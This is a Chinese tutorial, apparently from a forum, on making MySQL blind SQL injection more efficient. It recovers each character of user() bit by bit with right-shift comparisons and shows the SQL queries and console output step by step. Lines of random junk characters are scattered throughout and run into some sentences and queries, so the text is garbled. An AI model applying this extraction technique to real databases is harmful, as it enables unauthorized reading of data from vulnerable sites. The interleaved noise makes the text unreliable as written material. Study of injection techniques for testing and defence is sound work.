关于通过对8bit的ascii做右位移提高mysql盲注效率

admin

通过这种方法我们只需要做8次select来确定一个键值的第一位或第n位

4 C9 T0 B! Q0 g$ k

& Z" B0 ~/ b8 L1 O9 J: K- U下面将以查询mysql数据库当中user()的第一位为例:
, |8 |4 }7 _2 l; P; s& z" ]
. g. g( q" a6 d# y1 E

4 N: B  D, ]3 m& V/ y6 w9 S9 Yps:第二位,第三位依次类推 select substr(user(),2,1) mysql> select substr(user(),3,1)
% j* X/ _# L/ m& S


) D# x" a. k- r5 u& d首先执行如下sql语句:

2 d1 [2 ]- R! C) H0 @
' b5 b0 F8 L9 u. K
% B( u/ H0 C: W- e8 w6 c8 Kmysql> select (ascii((substr(user(),1,1))) >> 7)=0;

3 a- E5 s2 n. e2 {8 t( F6 z1 U
1 [7 r' a# `7 {
我们将对这个8bit的ascii也就是user()的第一位做7次右偏移,也就是偏移到8bit的ascii的
9 P7 ~# N" N" W  \) G7 V4 G2 s


第一位并与0做等运算,如果,运算结果为0 说明第一位不为0,也就为1
! H% \6 H# l- d+ J& {5 Y
" j4 O6 F, D, w  j( z- b
. Y8 e$ V' [; o8 Z
如果运算结果为1,说明第一位为0,不为1

2 n: g# O: O( C( P! z2 v0 B( n$ Q
0 k) n/ |' f/ u  X/ a* W8 Y
+————————————–+
- N6 W9 Z3 ~( U4 Y5 W
| (ascii((substr(user(),1,1))) >> 7)=0 |

+————————————–+
. o$ W+ f  R. X+ L2 e6 f
- }, f. R4 S) Q7 N4 u" x| 1 |
* H- K0 b3 i3 U2 d$ k
. u6 Q7 z$ ^8 H$ `+————————————–+
. @0 w/ O# ]& X; x1 }
1 row in set (0.00 sec)

. ~) F, e9 b1 n% n这样我们就确定这个8bit的ascii的第一位为0
7 e# I6 ^5 r5 l& y8 i8 B

! K3 p# k; `6 c- h' A: |) \
3 k( Q7 a4 D. e& K! a" a8 E0 c# l第二次我们来做6次右偏移来确定前两位

9 t8 [% Z, Z& D! {; N+ P

; G7 T6 E# _+ c8 b5 o8 B: ^前两位可能是01或00,即依然可以与0做比较,

& g( p2 {8 z& X" Y8 M& Nmysql> select (ascii((substr(user(),1,1))) >> 6)=0;

+————————————–+
& }. W9 h; F! N( z  q9 O+ l2 U
| (ascii((substr(user(),1,1))) >> 6)=0 |

6 Y+ }% t/ M7 A; ^* t  @3 O  h+————————————–+
6 K4 x' [- E3 H* u9 n; Q" m
2 Z; A: T+ w+ s# g$ G' c# g% j7 I| 0 |
8 c) h/ D% b* q" O% j6 n
- }' ]& `0 y3 S  T5 d: T* Y+————————————–+

( m& {' `, [" `& Z  D0 ^: @1 row in set (0.00 sec)
; j4 z# A8 r+ w1 Y1 ~$ A: H7 h
* i( d& q( Y+ V# @
: G% {: z- g1 e, g/ Z: V2 L% O: r
结果为0,即第二位为1


' x% \5 l4 T3 ^7 a4 O0 Y- f; r6 ~1 q
1 j6 }. G4 a: r% U% r6 n7 P) {4 ^开始猜测前三位为010或011
# V% C+ u. c/ e0 o1 r

; @* ?" F" Z  @/ Q
3 e1 j* [1 d* U' O5 r让我们看看010和011的ascii码是多少
6 z- U4 w4 N/ G0 ]; U" s+ _


6 E8 _9 B0 n# Q* p7 @4 j, S分别查询select b’011′ select b’010′

9 s# U2 Q# L% t) _" d4 }4 g
# |* m$ Q) M4 H$ x& c& Y! |
8 Q$ [2 }4 \  a' T' H获得结果 010 = 2 011 = 3


" Q- A% l. A" {9 b. j1 n- h
' F+ m. J2 C4 K执行如下sql:

# o. Q3 D0 r! @6 F8 g) Z

mysql> select (ascii((substr(user(),1,1))) >> 5)=2;

+————————————–+
$ [/ `. T( p& |2 {. X
| (ascii((substr(user(),1,1))) >> 5)=2 |
3 x8 h: u% W0 ^, E2 a
' w: @- d5 ^2 A  u) v+————————————–+

  s: E3 k# d: m# u3 A9 O| 0 |
: i# a! k# x: I* x2 {' @; c0 z
. k" K$ `! ^4 i! Z; \+————————————–+
6 D% {1 u9 n" Y
2 G, i3 ~/ U/ P即前三位不为010,而是011


3 Q# s, M# i. X8 O& W/ I
直到获得最后一位

& b# c/ _- Y  d/ l+ {2 I

$ b- @" o+ [/ M0 C  D& d最终结果为:01110010
+ l8 h1 w8 e, h. ^# l0 i3 S

* ?. C  a9 u- T8 f) X: |$ ]
转换一下:
0 L8 q2 q1 U1 j1 U0 b/ Z
. i" }0 n+ V! |
# j* f! ~& J" ^  v6 r3 V) H  V+ s
! P( f* h) x" @select b’01110010′



8 _4 r3 t9 z) h3 F) E4 \查询结果
, w3 s0 s# b5 ], k/ q8 s; H4 G


+————-+

| b’01110010′ |
9 t, _9 p7 N$ K; }; y; ~! F: E
+————-+

| r |
5 l8 r( G$ m% \: n
; i5 ^' ?  W4 E9 F+————-+
1 j" K- _. E$ o% Y3 g! D3 K
/ W. _4 b/ C1 {& M% r2 q/ F1 row in set (0.00 sec)


* D! l4 H7 |5 }0 P( D- o; o, v
这样我们就获得了user()的第一位.其它位依此类推

8 Q( }4 s& W4 f6 F1 x4 P